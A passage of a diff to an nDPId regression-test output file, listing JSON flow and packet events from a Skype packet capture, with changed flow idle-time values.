+00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1642,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":248,"flow_packet_id":1,"flow_last_seen":1431970691584,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970691584,"pkt":"0NQSxnP1PBXCt3IOCABFAABA+lxAAEAGSlXAqAEiW77YfchjMD4Tm3MJAAAAALAC\/\/8foQAAAgQFtAEDAwUBAQgKPjJj3QAAAAAEAgAA"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1646,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":248,"flow_packet_id":2,"flow_last_seen":1431970691636,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970691636,"pkt":"PBXCt3IO0NQSxnP1CABFCAA0Yg5AAPUGLadbvth9wKgBIjA+yGMdRKLvE5tzCoASH\/4ZmQAAAgQFoAEDAwQBAQQC"} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1647,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":248,"flow_packet_id":3,"flow_last_seen":1431970691636,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431970691636,"pkt":"0NQSxnP1PBXCt3IOCABFAAAosdpAAEAGku\/AqAEiW77YfchjMD4Tm3MKHUSi8FAQIABaUgAA"} +00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1673,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970691783,"flow_last_seen":1431970691783,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970691783,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":51300,"dst_port":20274,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1673,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":249,"flow_packet_id":1,"flow_last_seen":1431970691783,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970691783,"pkt":"0NQSxnP1PBXCt3IOCABFAABA6ABAAEAGoz\/AqAEiTKehBshkTzK\/rUQGAAAAALAC\/\/\/JZwAAAgQFtAEDAwUBAQgKPjJkoAAAAAAEAgAA"} +00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1684,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":249,"flow_packet_id":2,"flow_last_seen":1431970692055,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970692055,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAAC4GnURMp6EGwKgBIk8yyGRH9b\/zv61EB6AScSDahgAAAgQFrAQCCAq+r8ghPjJkoAEDAwc="} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1685,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":249,"flow_packet_id":3,"flow_last_seen":1431970692055,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431970692055,"pkt":"0NQSxnP1PBXCt3IOCABFAAAop\/VAAEAG42LAqAEiTKehBshkTzK\/rUQHAAAAAFAEAADlHAAA"} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1696,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":230,"flow_packet_id":2,"flow_last_seen":1431970692292,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1431970692292,"pkt":"0NQSxnP1PBXCt3IOCABFAAAuAIoAAEARXlnAqAEirjGr4DLdfQsAGsvlfaACeL8XUJBpLDeRz+sEHWOI"} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1697,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":231,"flow_packet_id":2,"flow_last_seen":1431970692292,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1431970692292,"pkt":"0NQSxnP1PBXCt3IOCABFAAAug2AAAEAR1cjAqAEiUx8MrTLdXYMAGvz0faICfIT9gb6c5K1Sd5xbHa0C"} -00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1702,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970692464,"flow_last_seen":1431970692464,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970692464,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"82.224.110.241","src_port":51301,"dst_port":38895,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1702,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":250,"flow_packet_id":1,"flow_last_seen":1431970692464,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970692464,"pkt":"0NQSxnP1PBXCt3IOCABFAABAG0ZAAEAGm9bAqAEiUuBu8chll+8qmATQAAAAALAC\/\/9+NAAAAgQFtAEDAwUBAQgKPjJnPQAAAAAEAgAA"} -00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1705,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":250,"flow_packet_id":2,"flow_last_seen":1431970692533,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970692533,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8K7ZAAHIGWWpS4G7xwKgBIpfvyGV1sVenKpgE0aASIACFcQAAAgQFrAEDAwgEAggKAAccXD4yZz0="} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1706,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":250,"flow_packet_id":3,"flow_last_seen":1431970692533,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970692533,"pkt":"0NQSxnP1PBXCt3IOCABFAAA061FAAEAGy9bAqAEiUuBu8chll+8qmATRdbFXqIAQECzDxgAAAQEICj4yZ4EABxxc"} -00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1753,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970693196,"flow_last_seen":1431970693196,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970693196,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":51302,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1753,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":251,"flow_packet_id":1,"flow_last_seen":1431970693196,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970693196,"pkt":"0NQSxnP1PBXCt3IOCABFAABAWFNAAEAG7F7AqAEiW77YfchmAbumoVhjAAAAALAC\/\/\/PlQAAAgQFtAEDAwUBAQgKPjJqCAAAAAAEAgAA"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1754,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":251,"flow_packet_id":2,"flow_last_seen":1431970693239,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970693239,"pkt":"PBXCt3IO0NQSxnP1CABFCAA0PUNAAPUGUnJbvth9wKgBIgG7yGaCZHojpqFYZIASH\/6TZAAAAgQFoAEDAwQBAQQC"} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1755,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":251,"flow_packet_id":3,"flow_last_seen":1431970693239,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431970693239,"pkt":"0NQSxnP1PBXCt3IOCABFAAAoI6NAAEAGISfAqAEiW77YfchmAbumoVhkgmR6JFAQIADUHQAA"} -00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1790,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970694308,"flow_last_seen":1431970694308,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970694308,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.121.84.93","src_port":51303,"dst_port":62381,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1790,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":252,"flow_packet_id":1,"flow_last_seen":1431970694308,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970694308,"pkt":"0NQSxnP1PBXCt3IOCABFAABA0wpAAEAGAQ3AqAEiUHlUXchn861MQWgbAAAAALAC\/\/+zaQAAAgQFtAEDAwUBAQgKPjJuTgAAAAAEAgAA"} -00614{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1791,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1431970689672,"flow_last_seen":1431970694329,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1124,"flow_tot_l4_payload_len":2899,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1431970694329,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.83.77.141","src_port":51294,"dst_port":17639,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1812,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":252,"flow_packet_id":2,"flow_last_seen":1431970695316,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970695316,"pkt":"0NQSxnP1PBXCt3IOCABFAABAwedAAEAGEjDAqAEiUHlUXchn861MQWgbAAAAALAC\/\/+vgAAAAgQFtAEDAwUBAQgKPjJyNwAAAAAEAgAA"} -00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1817,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970695865,"flow_last_seen":1431970695865,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970695865,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51305,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1817,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":253,"flow_packet_id":1,"flow_last_seen":1431970695865,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970695865,"pkt":"0NQSxnP1PBXCt3IOCABFAABAWQRAAEAGas3AqAEilQ0gD8hpNFCsfgF7AAAAALAC\/\/9i1QAAAgQFtAEDAwUBAQgKPjJ0WwAAAAAEAgAA"} -00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1819,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":253,"flow_packet_id":2,"flow_last_seen":1431970695908,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970695908,"pkt":"PBXCt3IO0NQSxnP1CABFCAA8AABAADUGzs2VDSAPwKgBIjRQyGm+xiHqrH4BfKASOJCW7wAAAgQFrAQCCAo\/i4QRPjJ0WwEDAwk="} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1820,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":253,"flow_packet_id":3,"flow_last_seen":1431970695908,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970695908,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0yZ5AAEAG+j7AqAEilQ0gD8hpNFCsfgF8vsYh64AQECzt7wAAAQEICj4ydIU\/i4QR"} -00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1821,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970695909,"flow_last_seen":1431970695909,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970695909,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.121.84.93","src_port":51306,"dst_port":62381,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1821,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":254,"flow_packet_id":1,"flow_last_seen":1431970695909,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970695909,"pkt":"0NQSxnP1PBXCt3IOCABFAABA2LhAAEAG+17AqAEiUHlUXchq861iaxDLAAAAALAC\/\/\/uVQAAAgQFtAEDAwUBAQgKPjJ0hQAAAAAEAgAA"} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1833,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":252,"flow_packet_id":3,"flow_last_seen":1431970696322,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970696322,"pkt":"0NQSxnP1PBXCt3IOCABFAABAkb9AAEAGQljAqAEiUHlUXchn861MQWgbAAAAALAC\/\/+rmAAAAgQFtAEDAwUBAQgKPjJ2HwAAAAAEAgAA"} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1838,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":254,"flow_packet_id":2,"flow_last_seen":1431970696915,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970696915,"pkt":"0NQSxnP1PBXCt3IOCABFAABAStVAAEAGiULAqAEiUHlUXchq861iaxDLAAAAALAC\/\/\/qbAAAAgQFtAEDAwUBAQgKPjJ4bgAAAAAEAgAA"} +00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1702,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970692464,"flow_last_seen":1431970692464,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970692464,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"82.224.110.241","src_port":51301,"dst_port":38895,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1702,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":250,"flow_packet_id":1,"flow_last_seen":1431970692464,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970692464,"pkt":"0NQSxnP1PBXCt3IOCABFAABAG0ZAAEAGm9bAqAEiUuBu8chll+8qmATQAAAAALAC\/\/9+NAAAAgQFtAEDAwUBAQgKPjJnPQAAAAAEAgAA"} +00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1705,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":250,"flow_packet_id":2,"flow_last_seen":1431970692533,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970692533,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8K7ZAAHIGWWpS4G7xwKgBIpfvyGV1sVenKpgE0aASIACFcQAAAgQFrAEDAwgEAggKAAccXD4yZz0="} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1706,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":250,"flow_packet_id":3,"flow_last_seen":1431970692533,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970692533,"pkt":"0NQSxnP1PBXCt3IOCABFAAA061FAAEAGy9bAqAEiUuBu8chll+8qmATRdbFXqIAQECzDxgAAAQEICj4yZ4EABxxc"} +00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1753,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970693196,"flow_last_seen":1431970693196,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970693196,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":51302,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1753,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":251,"flow_packet_id":1,"flow_last_seen":1431970693196,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970693196,"pkt":"0NQSxnP1PBXCt3IOCABFAABAWFNAAEAG7F7AqAEiW77YfchmAbumoVhjAAAAALAC\/\/\/PlQAAAgQFtAEDAwUBAQgKPjJqCAAAAAAEAgAA"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1754,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":251,"flow_packet_id":2,"flow_last_seen":1431970693239,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970693239,"pkt":"PBXCt3IO0NQSxnP1CABFCAA0PUNAAPUGUnJbvth9wKgBIgG7yGaCZHojpqFYZIASH\/6TZAAAAgQFoAEDAwQBAQQC"} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1755,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":251,"flow_packet_id":3,"flow_last_seen":1431970693239,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431970693239,"pkt":"0NQSxnP1PBXCt3IOCABFAAAoI6NAAEAGISfAqAEiW77YfchmAbumoVhkgmR6JFAQIADUHQAA"} +00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1790,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970694308,"flow_last_seen":1431970694308,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970694308,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.121.84.93","src_port":51303,"dst_port":62381,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1790,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":252,"flow_packet_id":1,"flow_last_seen":1431970694308,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970694308,"pkt":"0NQSxnP1PBXCt3IOCABFAABA0wpAAEAGAQ3AqAEiUHlUXchn861MQWgbAAAAALAC\/\/+zaQAAAgQFtAEDAwUBAQgKPjJuTgAAAAAEAgAA"} +00614{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1791,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1431970689672,"flow_last_seen":1431970694329,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1124,"flow_tot_l4_payload_len":2899,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1431970694329,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.83.77.141","src_port":51294,"dst_port":17639,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1812,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":252,"flow_packet_id":2,"flow_last_seen":1431970695316,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970695316,"pkt":"0NQSxnP1PBXCt3IOCABFAABAwedAAEAGEjDAqAEiUHlUXchn861MQWgbAAAAALAC\/\/+vgAAAAgQFtAEDAwUBAQgKPjJyNwAAAAAEAgAA"} +00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1817,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970695865,"flow_last_seen":1431970695865,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970695865,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51305,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1817,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":253,"flow_packet_id":1,"flow_last_seen":1431970695865,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970695865,"pkt":"0NQSxnP1PBXCt3IOCABFAABAWQRAAEAGas3AqAEilQ0gD8hpNFCsfgF7AAAAALAC\/\/9i1QAAAgQFtAEDAwUBAQgKPjJ0WwAAAAAEAgAA"} +00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1819,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":253,"flow_packet_id":2,"flow_last_seen":1431970695908,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970695908,"pkt":"PBXCt3IO0NQSxnP1CABFCAA8AABAADUGzs2VDSAPwKgBIjRQyGm+xiHqrH4BfKASOJCW7wAAAgQFrAQCCAo\/i4QRPjJ0WwEDAwk="} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1820,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":253,"flow_packet_id":3,"flow_last_seen":1431970695908,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970695908,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0yZ5AAEAG+j7AqAEilQ0gD8hpNFCsfgF8vsYh64AQECzt7wAAAQEICj4ydIU\/i4QR"} +00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1821,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970695909,"flow_last_seen":1431970695909,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970695909,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.121.84.93","src_port":51306,"dst_port":62381,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1821,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":254,"flow_packet_id":1,"flow_last_seen":1431970695909,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970695909,"pkt":"0NQSxnP1PBXCt3IOCABFAABA2LhAAEAG+17AqAEiUHlUXchq861iaxDLAAAAALAC\/\/\/uVQAAAgQFtAEDAwUBAQgKPjJ0hQAAAAAEAgAA"} 